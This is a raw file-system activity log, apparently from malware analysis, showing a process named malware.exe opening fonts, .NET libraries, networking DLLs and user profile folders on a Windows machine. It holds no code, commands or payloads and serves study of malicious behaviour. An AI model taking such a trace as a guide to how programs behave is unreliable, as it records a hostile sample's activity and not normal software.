29/2/2020 - 1:46:46.637Open1480C:\malware.exeC:\Windows\Fonts\webdings.ttf
29/2/2020 - 1:46:46.731Open1480C:\malware.exeC:\Windows\Fonts\webdings.ttf
29/2/2020 - 1:46:46.731Open1480C:\malware.exeC:\Windows\Fonts\coure.fon
29/2/2020 - 1:46:46.731Open1480C:\malware.exeC:\Windows\Fonts\coure.fon
29/2/2020 - 1:46:46.731Open1480C:\malware.exeC:\Windows\Fonts\coure.fon
29/2/2020 - 1:46:46.731Open1480C:\malware.exeC:\Windows\Fonts\serife.fon
29/2/2020 - 1:46:46.731Open1480C:\malware.exeC:\Windows\Fonts\serife.fon
29/2/2020 - 1:46:46.731Open1480C:\malware.exeC:\Windows\Fonts\serife.fon
29/2/2020 - 1:46:46.731Open1480C:\malware.exeC:\Windows\Fonts\sserife.fon
29/2/2020 - 1:46:46.731Open1480C:\malware.exeC:\Windows\Fonts\sserife.fon
29/2/2020 - 1:46:46.731Open1480C:\malware.exeC:\Windows\Fonts\sserife.fon
29/2/2020 - 1:46:46.731Open1480C:\malware.exeC:\Windows\Fonts\smalle.fon
29/2/2020 - 1:46:46.731Open1480C:\malware.exeC:\Windows\Fonts\smalle.fon
29/2/2020 - 1:46:46.731Open1480C:\malware.exeC:\Windows\Fonts\smalle.fon
29/2/2020 - 1:46:46.731Open1480C:\malware.exeC:\Windows\Fonts\smallf.fon
29/2/2020 - 1:46:46.731Open1480C:\malware.exeC:\Windows\Fonts\smallf.fon
29/2/2020 - 1:46:46.731Open1480C:\malware.exeC:\Windows\Fonts\smallf.fon
29/2/2020 - 1:46:46.731Open1480C:\malware.exeC:\Windows\Fonts\calibrili.ttf
29/2/2020 - 1:46:46.731Unknown1480C:\malware.exeC:\Windows\Fonts\calibrili.ttfcalibrili.ttf
29/2/2020 - 1:46:46.731Open1480C:\malware.exeC:\Windows\Fonts\calibrili.ttf
29/2/2020 - 1:46:46.731Unknown1480C:\malware.exeC:\Windows\Fonts\calibrili.ttfcalibrili.ttf
29/2/2020 - 1:46:46.731Open1480C:\malware.exeC:\Windows\Fonts\calibrili.ttf
29/2/2020 - 1:46:46.731Read1480C:\malware.exeC:\Windows\Fonts\calibrili.ttfcalibrili.ttf
29/2/2020 - 1:46:46.778Read1480C:\malware.exeC:\Windows\Fonts\calibrili.ttfcalibrili.ttf
29/2/2020 - 1:46:46.825Read1480C:\malware.exeC:\Windows\Fonts\calibrili.ttfcalibrili.ttf
29/2/2020 - 1:46:46.872Open1480C:\malware.exeC:\Windows\Fonts\calibrili.ttf
29/2/2020 - 1:46:46.872Read1480C:\malware.exeC:\Windows\Fonts\calibrili.ttfcalibrili.ttf
29/2/2020 - 1:46:46.918Read1480C:\malware.exeC:\Windows\Fonts\calibrili.ttfcalibrili.ttf
29/2/2020 - 1:46:46.965Read1480C:\malware.exeC:\Windows\Fonts\calibrili.ttfcalibrili.ttf
29/2/2020 - 1:46:47.12Read1480C:\malware.exeC:\Windows\Fonts\calibrili.ttfcalibrili.ttf
29/2/2020 - 1:46:47.59Read1480C:\malware.exeC:\Windows\Fonts\calibrili.ttfcalibrili.ttf
29/2/2020 - 1:46:47.106Read1480C:\malware.exeC:\Windows\Fonts\calibrili.ttfcalibrili.ttf
29/2/2020 - 1:46:47.153Read1480C:\malware.exeC:\Windows\Fonts\calibrili.ttfcalibrili.ttf
29/2/2020 - 1:46:47.200Unknown1480C:\malware.exeC:\Windows\Fonts\calibrili.ttfcalibrili.ttf
29/2/2020 - 1:46:47.200Open1480C:\malware.exeC:\Windows\Fonts\calibril.ttf
29/2/2020 - 1:46:47.200Open1480C:\malware.exeC:\Windows\Fonts\calibril.ttf
29/2/2020 - 1:46:47.200Open1480C:\malware.exeC:\Windows\Fonts\calibril.ttf
29/2/2020 - 1:46:47.340Open1480C:\malware.exeC:\Windows\Fonts\calibril.ttf
29/2/2020 - 1:46:47.715Open1480C:\malware.exeC:\Users\Behemot\AppData\Local\GDIPFONTCACHEV1.DAT
29/2/2020 - 1:46:47.715Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Local\GDIPFONTCACHEV1.DATGDIPFONTCACHEV1.DAT
29/2/2020 - 1:46:47.715Read1480C:\malware.exeC:\Users\Behemot\AppData\Local\GDIPFONTCACHEV1.DATGDIPFONTCACHEV1.DAT
29/2/2020 - 1:46:47.715Read1480C:\malware.exeC:\Users\Behemot\AppData\Local\GDIPFONTCACHEV1.DATGDIPFONTCACHEV1.DAT
29/2/2020 - 1:46:47.715Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Local\GDIPFONTCACHEV1.DATGDIPFONTCACHEV1.DAT
29/2/2020 - 1:46:47.715Open1480C:\malware.exeC:\Windows\Fonts\tahoma.ttf
29/2/2020 - 1:46:47.715Open1480C:\malware.exeC:\Windows\Fonts\msjh.ttf
29/2/2020 - 1:46:47.715Open1480C:\malware.exeC:\Windows\Fonts\msyh.ttf
29/2/2020 - 1:46:47.715Open1480C:\malware.exeC:\Windows\Fonts\malgun.ttf
29/2/2020 - 1:46:47.715Open1480C:\malware.exeC:\Windows\Fonts\micross.ttf
29/2/2020 - 1:46:47.715Open1480C:\malware.exeC:\Windows\Fonts\micross.ttf
29/2/2020 - 1:46:47.715Open1480C:\malware.exeC:\Windows\Fonts\micross.ttf
29/2/2020 - 1:46:47.715Open1480C:\malware.exeC:\Windows\Fonts\micross.ttf
29/2/2020 - 1:46:47.715Open1480C:\malware.exeC:\Windows\Fonts\micross.ttf
29/2/2020 - 1:46:47.715Open1480C:\malware.exeC:\Windows\Fonts\micross.ttf
29/2/2020 - 1:46:47.715Open1480C:\malware.exeC:\Windows\Fonts\segoeui.ttf
29/2/2020 - 1:46:47.715Open1480C:\malware.exeC:\Windows\Fonts\msyh.ttf
29/2/2020 - 1:46:47.715Open1480C:\malware.exeC:\Windows\Fonts\malgun.ttf
29/2/2020 - 1:46:47.715Open1480C:\malware.exeC:\Windows\Fonts\micross.ttf
29/2/2020 - 1:46:47.715Open1480C:\malware.exeC:\Windows\Fonts\micross.ttf
29/2/2020 - 1:46:47.715Open1480C:\malware.exeC:\Windows\Fonts\segoeui.ttf
29/2/2020 - 1:46:47.715Open1480C:\malware.exeC:\Windows\Fonts\msjh.ttf
29/2/2020 - 1:46:47.715Open1480C:\malware.exeC:\Windows\Fonts\malgun.ttf
29/2/2020 - 1:46:47.715Open1480C:\malware.exeC:\Windows\Fonts\segoeui.ttf
29/2/2020 - 1:46:47.715Open1480C:\malware.exeC:\Windows\Fonts\msjh.ttf
29/2/2020 - 1:46:47.715Open1480C:\malware.exeC:\Windows\Fonts\msyh.ttf
29/2/2020 - 1:46:47.715Open1480C:\malware.exeC:\Windows\Fonts\malgun.ttf
29/2/2020 - 1:46:47.715Open1480C:\malware.exeC:\Windows\Fonts\segoeui.ttf
29/2/2020 - 1:46:47.715Open1480C:\malware.exeC:\Windows\Fonts\msjh.ttf
29/2/2020 - 1:46:47.715Open1480C:\malware.exeC:\Windows\Fonts\msyh.ttf
29/2/2020 - 1:46:47.715Open1480C:\malware.exeC:\Windows\Fonts\malgun.ttf
29/2/2020 - 1:46:47.715Open1480C:\malware.exeC:\Windows\Fonts\micross.ttf
29/2/2020 - 1:46:47.715Open1480C:\malware.exeC:\Windows\Fonts\micross.ttf
29/2/2020 - 1:46:47.715Open1480C:\malware.exeC:\Windows\Fonts\segoeui.ttf
29/2/2020 - 1:46:47.715Open1480C:\malware.exeC:\Windows\Fonts\msjh.ttf
29/2/2020 - 1:46:47.715Open1480C:\malware.exeC:\Windows\Fonts\msyh.ttf
29/2/2020 - 1:46:47.762Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:46:47.809Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:46:47.856Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:46:47.903Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:46:47.950Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:46:47.997Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:48.43Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dllmscorlib.ni.dll
29/2/2020 - 1:46:48.90Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:48.137Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:48.184Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:48.231Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:48.278Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:48.325Open1480C:\malware.exeC:\dwmapi.dll
29/2/2020 - 1:46:48.325Open1480C:\malware.exeC:\Windows\SysWOW64\dwmapi.dll
29/2/2020 - 1:46:48.325Open1480C:\malware.exeC:\Windows\SysWOW64\dwmapi.dll
29/2/2020 - 1:46:48.372Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:48.418Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:48.465Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:48.512Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:48.559Open1480C:\malware.exeC:\Windows\Fonts\StaticCache.dat
29/2/2020 - 1:46:48.559Read1480C:\malware.exeC:\Windows\Fonts\StaticCache.datStaticCache.dat
29/2/2020 - 1:46:48.559Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:48.606Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:48.653Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:48.700Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:48.747Open1480C:\malware.exeC:\Windows\SysWOW64\ieframe.dll
29/2/2020 - 1:46:48.747Open1480C:\malware.exeC:\Windows\SysWOW64\ieframe.dll
29/2/2020 - 1:46:48.747Open1480C:\malware.exeC:\Windows\SysWOW64\api-ms-win-downlevel-shell32-l1-1-0.dll
29/2/2020 - 1:46:48.747Unknown1480C:\malware.exeC:\Windows\SysWOW64\api-ms-win-downlevel-shell32-l1-1-0.dllapi-ms-win-downlevel-shell32-l1-1-0.dll
29/2/2020 - 1:46:48.747Open1480C:\malware.exeC:\Windows\SysWOW64\api-ms-win-downlevel-shell32-l1-1-0.dll
29/2/2020 - 1:46:48.747Unknown1480C:\malware.exeC:\Windows\SysWOW64\api-ms-win-downlevel-shell32-l1-1-0.dllapi-ms-win-downlevel-shell32-l1-1-0.dll
29/2/2020 - 1:46:48.747Open1480C:\malware.exeC:\Windows\SysWOW64\ieframe.dll
29/2/2020 - 1:46:48.747Open1480C:\malware.exeC:\malware.exe.Local
29/2/2020 - 1:46:48.747Open1480C:\malware.exeC:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d
29/2/2020 - 1:46:48.747Unknown1480C:\malware.exeC:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d
29/2/2020 - 1:46:48.747Open1480C:\malware.exeC:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d
29/2/2020 - 1:46:48.747Open1480C:\malware.exeC:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d\comctl32.dll
29/2/2020 - 1:46:48.747Open1480C:\malware.exeC:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d\comctl32.dll
29/2/2020 - 1:46:48.747Open1480C:\malware.exeC:\Windows\WindowsShell.Manifest
29/2/2020 - 1:46:48.747Unknown1480C:\malware.exeC:\Windows\WindowsShell.ManifestWindowsShell.Manifest
29/2/2020 - 1:46:48.747Open1480C:\malware.exeC:\SXS.DLL
29/2/2020 - 1:46:48.747Open1480C:\malware.exeC:\Windows\SysWOW64\sxs.dll
29/2/2020 - 1:46:48.747Open1480C:\malware.exeC:\Windows\SysWOW64\sxs.dll
29/2/2020 - 1:46:48.747Open1480C:\malware.exeC:\Windows\SysWOW64\ieframe.dll
29/2/2020 - 1:46:48.747Read1480C:\malware.exeC:\Windows\SysWOW64\ieframe.dll
29/2/2020 - 1:46:48.747Read1480C:\malware.exeC:\Windows\SysWOW64\ieframe.dll
29/2/2020 - 1:46:48.747Read1480C:\malware.exeC:\Windows\SysWOW64\ieframe.dll
29/2/2020 - 1:46:48.747Read1480C:\malware.exeC:\Windows\SysWOW64\ieframe.dll
29/2/2020 - 1:46:48.747Read1480C:\malware.exeC:\Windows\SysWOW64\ieframe.dll
29/2/2020 - 1:46:48.747Read1480C:\malware.exeC:\Windows\SysWOW64\ieframe.dll
29/2/2020 - 1:46:48.747Read1480C:\malware.exeC:\Windows\SysWOW64\ieframe.dll
29/2/2020 - 1:46:48.747Read1480C:\malware.exeC:\Windows\SysWOW64\ieframe.dll
29/2/2020 - 1:46:48.747Read1480C:\malware.exeC:\Windows\SysWOW64\ieframe.dll
29/2/2020 - 1:46:48.747Read1480C:\malware.exeC:\Windows\SysWOW64\ieframe.dll
29/2/2020 - 1:46:48.747Read1480C:\malware.exeC:\Windows\SysWOW64\ieframe.dll
29/2/2020 - 1:46:48.747Read1480C:\malware.exeC:\Windows\SysWOW64\ieframe.dll
29/2/2020 - 1:46:48.747Read1480C:\malware.exeC:\Windows\SysWOW64\ieframe.dll
29/2/2020 - 1:46:48.747Read1480C:\malware.exeC:\Windows\SysWOW64\ieframe.dll
29/2/2020 - 1:46:48.747Read1480C:\malware.exeC:\Windows\SysWOW64\ieframe.dll
29/2/2020 - 1:46:48.747Read1480C:\malware.exeC:\Windows\SysWOW64\ieframe.dll
29/2/2020 - 1:46:48.747Read1480C:\malware.exeC:\Windows\SysWOW64\ieframe.dll
29/2/2020 - 1:46:48.747Read1480C:\malware.exeC:\Windows\SysWOW64\ieframe.dll
29/2/2020 - 1:46:48.747Read1480C:\malware.exeC:\Windows\SysWOW64\ieframe.dll
29/2/2020 - 1:46:48.747Read1480C:\malware.exeC:\Windows\SysWOW64\ieframe.dll
29/2/2020 - 1:46:48.747Read1480C:\malware.exeC:\Windows\SysWOW64\ieframe.dll
29/2/2020 - 1:46:48.747Read1480C:\malware.exeC:\Windows\SysWOW64\ieframe.dll
29/2/2020 - 1:46:48.747Read1480C:\malware.exeC:\Windows\SysWOW64\ieframe.dll
29/2/2020 - 1:46:48.747Read1480C:\malware.exeC:\Windows\SysWOW64\ieframe.dll
29/2/2020 - 1:46:48.747Read1480C:\malware.exeC:\Windows\SysWOW64\ieframe.dll
29/2/2020 - 1:46:48.747Read1480C:\malware.exeC:\Windows\SysWOW64\ieframe.dll
29/2/2020 - 1:46:48.747Read1480C:\malware.exeC:\Windows\SysWOW64\ieframe.dll
29/2/2020 - 1:46:48.747Read1480C:\malware.exeC:\Windows\SysWOW64\ieframe.dll
29/2/2020 - 1:46:48.747Read1480C:\malware.exeC:\Windows\SysWOW64\ieframe.dll
29/2/2020 - 1:46:48.747Read1480C:\malware.exeC:\Windows\SysWOW64\ieframe.dll
29/2/2020 - 1:46:48.747Read1480C:\malware.exeC:\Windows\SysWOW64\ieframe.dll
29/2/2020 - 1:46:48.747Read1480C:\malware.exeC:\Windows\SysWOW64\ieframe.dll
29/2/2020 - 1:46:48.747Read1480C:\malware.exeC:\Windows\SysWOW64\ieframe.dll
29/2/2020 - 1:46:48.747Read1480C:\malware.exeC:\Windows\SysWOW64\ieframe.dll
29/2/2020 - 1:46:48.747Read1480C:\malware.exeC:\Windows\SysWOW64\ieframe.dll
29/2/2020 - 1:46:48.747Read1480C:\malware.exeC:\Windows\SysWOW64\ieframe.dll
29/2/2020 - 1:46:48.747Read1480C:\malware.exeC:\Windows\SysWOW64\ieframe.dll
29/2/2020 - 1:46:48.747Read1480C:\malware.exeC:\Windows\SysWOW64\ieframe.dll
29/2/2020 - 1:46:48.747Read1480C:\malware.exeC:\Windows\SysWOW64\ieframe.dll
29/2/2020 - 1:46:48.747Read1480C:\malware.exeC:\Windows\SysWOW64\ieframe.dll
29/2/2020 - 1:46:48.747Read1480C:\malware.exeC:\Windows\SysWOW64\ieframe.dll
29/2/2020 - 1:46:48.747Read1480C:\malware.exeC:\Windows\SysWOW64\ieframe.dll
29/2/2020 - 1:46:48.747Read1480C:\malware.exeC:\Windows\SysWOW64\ieframe.dll
29/2/2020 - 1:46:48.747Read1480C:\malware.exeC:\Windows\SysWOW64\ieframe.dll
29/2/2020 - 1:46:48.747Read1480C:\malware.exeC:\Windows\SysWOW64\ieframe.dll
29/2/2020 - 1:46:48.747Read1480C:\malware.exeC:\Windows\SysWOW64\ieframe.dll
29/2/2020 - 1:46:48.747Read1480C:\malware.exeC:\Windows\SysWOW64\ieframe.dll
29/2/2020 - 1:46:48.762Open1480C:\malware.exeC:\Windows\SysWOW64\pt-BR\KernelBase.dll.mui
29/2/2020 - 1:46:48.903Open1480C:\malware.exeC:\RpcRtRemote.dll
29/2/2020 - 1:46:48.903Open1480C:\malware.exeC:\Windows\SysWOW64\RpcRtRemote.dll
29/2/2020 - 1:46:48.903Unknown1480C:\malware.exeC:\Windows\SysWOW64\RpcRtRemote.dllRpcRtRemote.dll
29/2/2020 - 1:46:48.903Open1480C:\malware.exeC:\Windows\SysWOW64\RpcRtRemote.dll
29/2/2020 - 1:46:48.903Unknown1480C:\malware.exeC:\Windows\SysWOW64\RpcRtRemote.dllRpcRtRemote.dll
29/2/2020 - 1:46:48.950Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:48.950Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:48.950Open1480C:\malware.exeC:\api-ms-win-downlevel-shlwapi-l2-1-0.dll
29/2/2020 - 1:46:48.950Open1480C:\malware.exeC:\Windows\SysWOW64\api-ms-win-downlevel-shlwapi-l2-1-0.dll
29/2/2020 - 1:46:48.950Unknown1480C:\malware.exeC:\Windows\SysWOW64\api-ms-win-downlevel-shlwapi-l2-1-0.dllapi-ms-win-downlevel-shlwapi-l2-1-0.dll
29/2/2020 - 1:46:48.950Open1480C:\malware.exeC:\Windows\SysWOW64\api-ms-win-downlevel-shlwapi-l2-1-0.dll
29/2/2020 - 1:46:48.950Unknown1480C:\malware.exeC:\Windows\SysWOW64\api-ms-win-downlevel-shlwapi-l2-1-0.dllapi-ms-win-downlevel-shlwapi-l2-1-0.dll
29/2/2020 - 1:46:48.950Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:48.997Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:48.997Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:46:48.997Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:46:48.997Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:48.997Open1480C:\malware.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\OLEAUT32.dll
29/2/2020 - 1:46:48.997Open1480C:\malware.exeC:\PROPSYS.dll
29/2/2020 - 1:46:48.997Open1480C:\malware.exeC:\Windows\SysWOW64\propsys.dll
29/2/2020 - 1:46:48.997Open1480C:\malware.exeC:\Windows\SysWOW64\propsys.dll
29/2/2020 - 1:46:48.997Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dllSystem.Windows.Forms.ni.dll
29/2/2020 - 1:46:49.12Open1480C:\malware.exeC:\Windows\SysWOW64\shell32.dll
29/2/2020 - 1:46:49.12Open1480C:\malware.exeC:\malware.exe.Local
29/2/2020 - 1:46:49.12Open1480C:\malware.exeC:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d
29/2/2020 - 1:46:49.12Unknown1480C:\malware.exeC:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d
29/2/2020 - 1:46:49.12Open1480C:\malware.exeC:\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d
29/2/2020 - 1:46:49.12Open1480C:\malware.exeC:\apphelp.dll
29/2/2020 - 1:46:49.12Open1480C:\malware.exeC:\Windows\SysWOW64\apphelp.dll
29/2/2020 - 1:46:49.12Open1480C:\malware.exeC:\Windows\SysWOW64\apphelp.dll
29/2/2020 - 1:46:49.12Read1480C:\malware.exeC:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dllSystem.ni.dll
29/2/2020 - 1:46:49.12Open1480C:\malware.exeC:\Secur32.dll
29/2/2020 - 1:46:49.12Open1480C:\malware.exeC:\Windows\SysWOW64\secur32.dll
29/2/2020 - 1:46:49.12Open1480C:\malware.exeC:\Windows\SysWOW64\secur32.dll
29/2/2020 - 1:46:49.75Open1480C:\malware.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files
29/2/2020 - 1:46:49.75Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files
29/2/2020 - 1:46:49.75Open1480C:\malware.exeC:\api-ms-win-downlevel-advapi32-l2-1-0.dll
29/2/2020 - 1:46:49.75Open1480C:\malware.exeC:\Windows\SysWOW64\api-ms-win-downlevel-advapi32-l2-1-0.dll
29/2/2020 - 1:46:49.75Unknown1480C:\malware.exeC:\Windows\SysWOW64\api-ms-win-downlevel-advapi32-l2-1-0.dllapi-ms-win-downlevel-advapi32-l2-1-0.dll
29/2/2020 - 1:46:49.75Open1480C:\malware.exeC:\Windows\SysWOW64\api-ms-win-downlevel-advapi32-l2-1-0.dll
29/2/2020 - 1:46:49.75Unknown1480C:\malware.exeC:\Windows\SysWOW64\api-ms-win-downlevel-advapi32-l2-1-0.dllapi-ms-win-downlevel-advapi32-l2-1-0.dll
29/2/2020 - 1:46:49.75Open1480C:\malware.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat
29/2/2020 - 1:46:49.75Open1480C:\malware.exeC:\Windows\SysWOW64\winhttp.dll
29/2/2020 - 1:46:49.75Open1480C:\malware.exeC:\Windows\SysWOW64\winhttp.dll
29/2/2020 - 1:46:49.75Open1480C:\malware.exeC:\Windows\SysWOW64\webio.dll
29/2/2020 - 1:46:49.75Open1480C:\malware.exeC:\Windows\SysWOW64\webio.dll
29/2/2020 - 1:46:49.122Open1480C:\malware.exeC:\IPHLPAPI.DLL
29/2/2020 - 1:46:49.122Open1480C:\malware.exeC:\Windows\SysWOW64\IPHLPAPI.DLL
29/2/2020 - 1:46:49.122Open1480C:\malware.exeC:\Windows\SysWOW64\IPHLPAPI.DLL
29/2/2020 - 1:46:49.122Open1480C:\malware.exeC:\WINNSI.DLL
29/2/2020 - 1:46:49.122Open1480C:\malware.exeC:\Windows\SysWOW64\winnsi.dll
29/2/2020 - 1:46:49.122Open1480C:\malware.exeC:\Windows\SysWOW64\winnsi.dll
29/2/2020 - 1:46:49.122Open1480C:\malware.exeC:\DNSAPI.dll
29/2/2020 - 1:46:49.122Open1480C:\malware.exeC:\Windows\SysWOW64\dnsapi.dll
29/2/2020 - 1:46:49.122Open1480C:\malware.exeC:\Windows\SysWOW64\dnsapi.dll
29/2/2020 - 1:46:49.168Open1480C:\malware.exeC:\Windows\SysWOW64\mswsock.dll
29/2/2020 - 1:46:49.168Open1480C:\malware.exeC:\Windows\SysWOW64\mswsock.dll
29/2/2020 - 1:46:49.168Open1480C:\malware.exeC:\Windows\SysWOW64\wship6.dll
29/2/2020 - 1:46:49.168Open1480C:\malware.exeC:\Windows\SysWOW64\wship6.dll
29/2/2020 - 1:46:49.215Open1480C:\malware.exeC:\Users\Behemot
29/2/2020 - 1:46:49.215Open1480C:\malware.exeC:\Users\Behemot
29/2/2020 - 1:46:49.215Unknown1480C:\malware.exeC:\Users\Behemot
29/2/2020 - 1:46:49.215Open1480C:\malware.exeC:\Users\Behemot\AppData\Local
29/2/2020 - 1:46:49.215Open1480C:\malware.exeC:\Users\Behemot\AppData\Local
29/2/2020 - 1:46:49.215Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Local
29/2/2020 - 1:46:49.215Open1480C:\malware.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files
29/2/2020 - 1:46:49.215Open1480C:\malware.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files
29/2/2020 - 1:46:49.215Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files
29/2/2020 - 1:46:49.215Open1480C:\malware.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5
29/2/2020 - 1:46:49.215Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5
29/2/2020 - 1:46:49.215Open1480C:\malware.exeC:\Users\Behemot
29/2/2020 - 1:46:49.215Open1480C:\malware.exeC:\Users\Behemot
29/2/2020 - 1:46:49.215Unknown1480C:\malware.exeC:\Users\Behemot
29/2/2020 - 1:46:49.215Open1480C:\malware.exeC:\Users\Behemot\AppData\Roaming
29/2/2020 - 1:46:49.215Open1480C:\malware.exeC:\Users\Behemot\AppData\Roaming
29/2/2020 - 1:46:49.215Unknown1480C:\malware.exeC:\Users\Behemot\AppData\Roaming
